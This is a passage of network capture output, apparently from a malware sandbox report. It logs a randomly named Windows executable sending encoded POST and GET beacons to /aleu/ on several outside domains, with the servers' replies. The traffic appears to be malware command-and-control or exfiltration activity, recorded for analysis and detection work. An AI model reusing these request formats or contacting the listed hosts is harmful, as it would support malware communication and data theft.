                                                                                                                                                                          Data Ascii: MzYDklf=scK0XNFy15BLCH4qAqnNCkX3U5lyCG5l2EOvh7bjVSSAPGhwXvaQfRVEfFPTGxDfLzz3TjVlvM4GmRiAL1Uk9pnjT3fx8eegG3wU2ldUo8zES2XUG6p6X0BzEbs9gg4LAVR9cBwLhRoq7FIfDv55981cIcHW5xV36bV/fgBDql5W2BQaHAorgiXIy2Gl70+KFVQrVOVgIemKCJM2xQ==
                                                                                                                                                                          Apr 26, 2024 07:42:17.174994946 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:17 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-ServerIndex: llim605
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.7  49732        217.76.128.34   80                2912  C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 26, 2024 07:42:19.693320036 CEST  797                OUT        POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.colchondealquiler.com
                                                                                                                                                                          Origin: http://www.colchondealquiler.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.colchondealquiler.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=scK0XNFy15BLCnIqTd7NW0X0IplyMm5h2ECvh53KVAmAPjdwF+aQeRVEY1PWbhDWLz+ITiplvMsGmUmAKCAnyZnlaXfzy+egG3wU2hxyo87ERF/UEfV9aUByN7s9kg4HAVRfcDEthTQq7HAfA7l2081eMcG93x8z8elRZgwXtnZz+XN4dikH+zvz20iTsSj/HUUzYshBXpDgPbtyntjnHRk6UqVTat+7DrlC9MU=
Apr 26, 2024 07:42:19.944411993 CEST  1289               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:19 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-ServerIndex: llim603
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.7  49733        217.76.128.34   80                2912  C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 26, 2024 07:42:22.479690075 CEST  1810               OUT        POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.colchondealquiler.com
                                                                                                                                                                          Origin: http://www.colchondealquiler.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.colchondealquiler.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:42:22.756063938 CEST  1289               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:22 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-ServerIndex: llim605
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...
Apr 26, 2024 07:42:22.756195068 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
Apr 26, 2024 07:42:22.756535053 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
Apr 26, 2024 07:42:22.756603003 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
Apr 26, 2024 07:42:22.756644964 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
Apr 26, 2024 07:42:22.756707907 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
Apr 26, 2024 07:42:22.756721020 CEST | 360 | IN
                                                                                                                                                                          Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
Apr 26, 2024 07:42:22.756881952 CEST | 5 | IN
                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49734 | 217.76.128.34 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:25.701478004 CEST | 508 | OUT
GET /aleu/?MzYDklf=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUglop6X2S27Gspv7OD0R2VJ9wdDlZRLUHIVLQGAdIrEvlBBmGQJQcRJvk2sI&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.colchondealquiler.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:42:25.958693981 CEST | 1289 | IN
HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:25 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-ServerIndex: llim605
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Ascii: 1ebe<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.colchondealquiler.com</title> <meta name="description" content="$REGISTRANT1 $REGISTRANT2 $REGISTRANT3" /> <link rel="stylesheet" href="https://arsys.es/css/parking2.css"> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <i class="icon-seguimiento"></i> <p>Esta es la p&aacute;gina de:</p> <h1>www.colchondealquiler.com</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...
Apr 26, 2024 07:42:25.958717108 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header><section class="search"> <div class="center"> <span>busca tu
Apr 26, 2024 07:42:25.958772898 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: profesional</a> con tu nombre de dominio desde cualquier dispositivo.</p> </article> <article> <h2>Certificado SSL</h2> <p>Evita que tu web se muestre como "no segura" con el <a href="https://www.a
Apr 26, 2024 07:42:25.958822966 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: Online">Tienda Online</a>.</p> </article> ...<article> <h2>Posicionamiento SEO</h2> <p>Optimiza la <a href="https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_camp
Apr 26, 2024 07:42:25.959005117 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: tm_campaign=vps" title="Servidor VPS">servidor VPS</a>: potencia y rendimiento con transferencia ilimitada.</p> </article> <article> <h2>Servidor Dedicado</h2> <p>Administra tu propio <a href="https:
Apr 26, 2024 07:42:25.959223986 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: > <h2>Soluciones a Medida</h2> <p>Pensando en cada cliente para ofrecerle una <a href="https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions" title="Solucin empresarial a
Apr 26, 2024 07:42:25.959239960 CEST | 360 | IN
                                                                                                                                                                          Data Ascii: ctor('label[for=dom]').innerHTML + domainSearchText[domainSearchChar]; domainSearchChar++; } else { domainSearchChar = 0; document.querySelector('label[for=dom]').innerHTML = '';
Apr 26, 2024 07:42:25.959253073 CEST | 5 | IN
                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49735 | 52.175.38.24 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:32.381879091 CEST | 16 | IN
HTTP/1.1 200 OK
                                                                                                                                                                          Data Raw:
                                                                                                                                                                          Data Ascii:
Apr 26, 2024 07:42:32.381934881 CEST | 323 | IN
                                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://oblzpezqqfxqijsk.app" + "?p="+window.location.pathname + window.location.search.replace(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49736 | 52.175.38.24 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:35.258632898 CEST | 16 | IN
HTTP/1.1 200 OK
                                                                                                                                                                          Data Raw:
                                                                                                                                                                          Data Ascii:
Apr 26, 2024 07:42:35.258687019 CEST | 323 | IN
                                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://oblzpezqqfxqijsk.app" + "?p="+window.location.pathname + window.location.search.replace(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49737 | 52.175.38.24 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:38.148631096 CEST | 16 | IN
HTTP/1.1 200 OK
                                                                                                                                                                          Data Raw:
                                                                                                                                                                          Data Ascii:
Apr 26, 2024 07:42:38.148677111 CEST | 323 | IN
                                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8Connection: closeCache-Control: max-age=60Content-Length: 218<html><head><script>window.location.href= "https://oblzpezqqfxqijsk.app" + "?p="+window.location.pathname + window.location.search.replace(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49738 | 52.175.38.24 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:41.024205923 CEST | 16 | IN
HTTP/1.1 200 OK
                                                                                                                                                                          Data Raw:
                                                                                                                                                                          Data Ascii:
Apr 26, 2024 07:42:41.024231911 CEST | 323 | IN | Data Ascii: Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: max-age=60
Content-Length: 218
<html><head><script>window.location.href= "https://oblzpezqqfxqijsk.app" + "?p="+window.location.pathname + window.location.search.replace(
Apr 26, 2024 07:42:49.105999947 CEST | 6 | OUT | Data Raw: 47
Data Ascii: G
Apr 26, 2024 07:43:02.908773899 CEST | 6 | OUT | Data Raw: 45
Data Ascii: E


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49739 | 178.211.137.59 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:46.697215080 CEST | 774 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.skibinscy-finanse.pl
                                                                                                                                                                          Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=A2HY+qJBKj/mIfobayrybI/emvppO0x1xd982VnsYL+x3WasAuqToKj7nA66WMLJam2FyqzsJJxvdwuz0iYiV9GwevcDM4XecIAgKDHxGRBnn+6Lj2VTP958Oxgqb2Tijub6M9WBlrN0QRl9eaDJLQIhMeNfAC/hc0jqfnfjWJ9PhYHI9yedzJNqntY5OkuCGklJVg/VwJzdy/0JhQ==
Apr 26, 2024 07:42:46.952560902 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:46 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49740 | 178.211.137.59 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:49.483671904 CEST | 794 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.skibinscy-finanse.pl
                                                                                                                                                                          Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=A2HY+qJBKj/mOPYbYRDyLY/ZpPppUEx5xd582R/Cb+ux33qsSsCTvKj7gw67SML0amqryrfsJNZvdx+z01EjVtG2WPc7BYXecIAgKDCmGR5nmNSLiTpQRN59PxgqRWTmjubIM/jUlpF0QT99eLDGBQInIeMTGSXxZVLuaHnmSOtXkuaqnQSxtY1Rjv8PZCz3ElhRYCL0v+W3/tVN3v5YDGj1U6Nl8SBpOs0/H28=
Apr 26, 2024 07:42:49.740091085 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:49 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49741 | 178.211.137.59 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:52.268218040 CEST | 1807 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.skibinscy-finanse.pl
                                                                                                                                                                          Origin: http://www.skibinscy-finanse.pl
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.skibinscy-finanse.pl/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:42:52.527693033 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:52 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49742 | 178.211.137.59 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:55.058046103 CEST | 507 | OUT | GET /aleu/?MzYDklf=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sN/a7W8oTa9PDfIw3FkTWG11zhaPiohVHadQfG1I8c2eUqprtDPLWhOJ9&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.skibinscy-finanse.pl
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:42:55.311853886 CEST | 360 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:55 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49743 | 203.161.46.103 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:43:09.237421989 CEST | 753 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.fairmarty.top
                                                                                                                                                                          Origin: http://www.fairmarty.top
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=4GbMTgr0j9lSLwJ9EDNHlK6XhU7AkA37CXuHH8yDybIl1848QM4KgCgcfbCzFnYUXnPfT0HqTXIRFb1+dv+cKfZHQJM1HqBNqOdu8oWvdjScbNhatylZcggDmrHg4aDtoKVNt3YjVMNirNla3+TmJGLYXb1FrQzhD8j5bklbphk4gRv/PwHNmMxB70bnyn6GrR4YBxcUoKpD7BVRvg==
                                                                                                                                                                          Apr 26, 2024 07:43:09.440253019 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:09 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          18 | 192.168.2.7 | 49744 | 203.161.46.103 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:43:11.967274904 CEST | 773 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.fairmarty.top
                                                                                                                                                                          Origin: http://www.fairmarty.top
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.fairmarty.top/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=4GbMTgr0j9lSZg59BiNHiq6U/E7Avg3nCXiHH5STypsl1dI8TN4KuigcV7D5BnYKXgH9T17qTXMRFex+dfCbLPZBbpMzaaBNqOdu8oSBdjKcb9RatQMPSAhxxbHgy6DpoKVjtzQFVP1irM1a3rmwDGLeTb0KnQW4H/XlXW0PvxUbsHydVSLh4dJ6/2/RlBnzpQ8AMTo139Mp2T0V5Zm9Ti4NoqufxaJzzsiWn0A=
                                                                                                                                                                          Apr 26, 2024 07:43:12.165729046 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:12 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Content-Length: 389
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          19 | 192.168.2.7 | 49745 | 203.161.46.103 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:43:15.812611103 CEST | 1786 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
